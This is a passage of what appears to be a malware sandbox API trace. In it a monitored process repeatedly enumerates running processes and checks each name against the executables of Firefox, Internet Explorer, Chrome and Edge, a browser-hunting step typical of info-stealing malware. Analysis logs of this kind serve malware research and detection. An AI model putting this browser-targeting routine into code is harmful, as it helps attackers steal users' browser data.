th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.072] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0262.072] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0262.072] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0262.072] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.072] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0262.073] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0262.073] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0262.073] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0262.073] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0262.073] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.073] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0262.073] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0262.073] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0262.073] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.073] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.074] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0262.074] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0262.074] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0262.074] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.074] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.074] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0262.074] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0262.074] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0262.074] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.074] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.075] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0262.075] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0262.075] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0262.075] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0262.075] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0262.075] CloseHandle (hObject=0xd4) returned 1 [0262.075] Sleep (dwMilliseconds=0x3e8) [0263.266] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0263.268] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.268] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0263.268] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0263.268] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0263.268] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0263.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0263.269] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0263.269] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0263.269] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0263.269] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0263.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0263.270] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0263.270] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0263.270] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0263.270] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.270] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.270] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0263.270] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0263.270] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0263.270] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.270] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0263.271] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0263.271] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0263.271] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0263.271] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0263.271] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0263.271] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0263.271] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0263.271] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0263.272] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0263.272] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0263.272] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0263.272] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.272] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.272] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0263.272] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0263.272] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0263.272] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.272] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.273] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0263.273] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0263.273] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0263.273] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.273] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0263.274] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0263.274] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0263.274] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0263.274] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.274] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.274] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.274] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.274] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.274] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.274] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.275] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.275] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.275] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.275] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.275] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.275] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.275] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.275] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.275] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.275] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.276] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.276] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.276] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.276] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.276] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.277] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.277] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.277] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.277] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0263.277] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0263.277] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0263.277] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0263.277] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.277] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.278] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.278] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.278] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.278] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.278] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.278] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.278] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.278] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.278] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.278] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.279] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0263.279] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0263.279] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0263.279] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.279] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.279] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0263.280] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0263.280] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0263.280] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.280] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.280] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0263.280] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0263.280] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0263.280] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.280] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.281] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.281] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.281] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.281] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.281] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0263.281] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0263.281] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0263.281] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0263.281] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.281] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0263.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0263.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0263.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0263.282] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.282] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0263.282] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0263.282] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0263.282] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0263.282] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.282] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0263.283] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0263.283] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0263.283] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0263.283] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.283] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0263.283] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0263.283] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0263.283] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0263.284] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.284] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0263.284] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0263.284] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0263.284] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0263.284] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.284] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0263.285] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0263.285] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0263.285] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0263.285] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.285] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0263.285] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0263.285] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0263.285] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0263.285] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.285] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0263.286] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0263.286] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0263.286] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0263.286] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.286] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0263.286] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0263.286] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0263.286] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0263.286] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.286] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0263.287] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0263.287] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0263.287] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0263.287] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.287] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0263.287] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0263.287] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0263.287] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0263.288] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.288] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 